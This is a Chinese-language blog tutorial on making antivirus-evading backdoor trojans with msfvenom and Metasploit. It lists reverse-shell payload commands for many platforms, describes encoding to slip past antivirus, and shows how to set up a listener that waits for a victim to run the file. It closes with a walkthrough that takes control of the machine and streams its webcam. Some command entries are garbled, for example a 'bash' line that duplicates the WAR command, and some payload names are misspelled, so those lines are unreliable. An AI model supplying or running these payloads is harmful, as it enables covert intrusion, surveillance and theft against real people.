博舍

msf免杀木马生成 msfvenom生成shellcode

msf免杀木马生成

免杀技术全称为反杀毒技术AntiAnti-Virus简称"免杀",它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。

本章是通过msf(msfvenom)命令实现免杀的操作

msf常用命令

-p: 指定payload模块-l :列出可用项-f :指定文件类型-e:  加载编码器-b:删除无效字符-i :指定编码次数-x: 捆绑文件-o:导出文件

在kali中生成常见的木马命令

msfvenom-pwindows/meterpreter/reverse_tcp-ex86/shikata_ga_nai-i5lhost=xxx.xxx.xxx.xxxlport=xxxx -fexe>shell.exe

开启监听模块

msfconsole

useexploit/multi/handler

setpayloadwindows/meterpreter/reverse_tcp#设置攻击位

补充:常见的后门生成方式!!!!!

linux

msfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=LPORT=-felf>shell.elf

windows

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-fexe>shell.exe

mac

msfvenom-posx/x86/shell_reverse_tcpLHOST=LPORT=-fmacho>shell.macho

android

msfvenom-pandroid/meterpreter/reverse_tcpLHOST=LPORT=R>shell.apk

php

msfvenom-pphp/meterpreter_reverse_tcpLHOST=LPORT=-fraw>shell.php

asp

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-faspx>shell.asp

aspx

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-faspx>shell.aspx

jsp

msfvenom-pjava/jsp_shell_reverse_tcpLHOST=LPORT=-fraw>shell.jsp

war

msfvenom-pjava/jsp_shell_reverse_tcpLHOST=LPORT=-fwar>shell.war

bash

msfvenom-pjava/jsp_shell_reverse_tcpLHOST=LPORT=-fwar>shell.war

perl

msfvenom-pcmd/unix/reverse_perlLHOST=LPORT=-fraw>shell.pl

python

msfvenom-ppython/meterpreter/reverser_tcpLHOST=LPORT=-fraw>shell.py

msfvenom的使用

建立后门及应用

msfvenom-pwindows/x64/meterpreter_revers_tcp(攻击的是windows系统(可以理解为攻击载荷),下方配置msf模块要与该处一致)

lhost=192.168.234.128(kali的IP地址)

lport=9999(端口,随意,只要不被占用即可(注意!!!下方配置msf模块要与该处一致))

-fexe-odemo9999.exe(生成的是exe文件)

(1.)生成病毒(放到本机会被杀毒软件删除)

(2.)进入msfconsole

若有疑问请看http://t.csdn.cn/i5rWX

1.使用模块

useexploit/multi/handler

查看配置是否完善使用命令showoptions

说明:

Payloadoptions这一大栏代表攻击载荷的设置,如图所示此时攻击载荷是generic/shell_reverse_tcp,因为与我们要攻击的不一致,说明该攻击载荷是错误的,需要修改成我们攻击的(生成木马也就是后门的时候用的是什么改成什么即可)

2.配置模块

设置Payload(更改为正确的攻击载荷)

配置LHOST(kali的ip地址)、LPORT(kali的端口)

3.运行模块

run

接下来就是等待有人点击刚开生成的后门程序了

自我测试:

1.将生成的后门程序复制到本地文件夹去,这时杀毒软件会提醒将其杀掉,在查毒软件的隔离区中,找到生成的后门程序,提取到本地文件夹中

2.双击运行该后门程序,在kali中便会先显示有鱼儿上钩了,跳转到meterpreter拿到权限

3.help查看权限,列出可以做的指令

4.比如下方打开摄像头

(1)首先看是否有摄像头输入命令webcam_list

(2)以打开视频为例子输入命令webcam_stream

会有弹出火狐浏览器,该黑屏就是摄像头的视频画面

退出按CTRL+c

(记得玩完在本地的运行管理器中结束该后门程序的任务)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。

上一篇

下一篇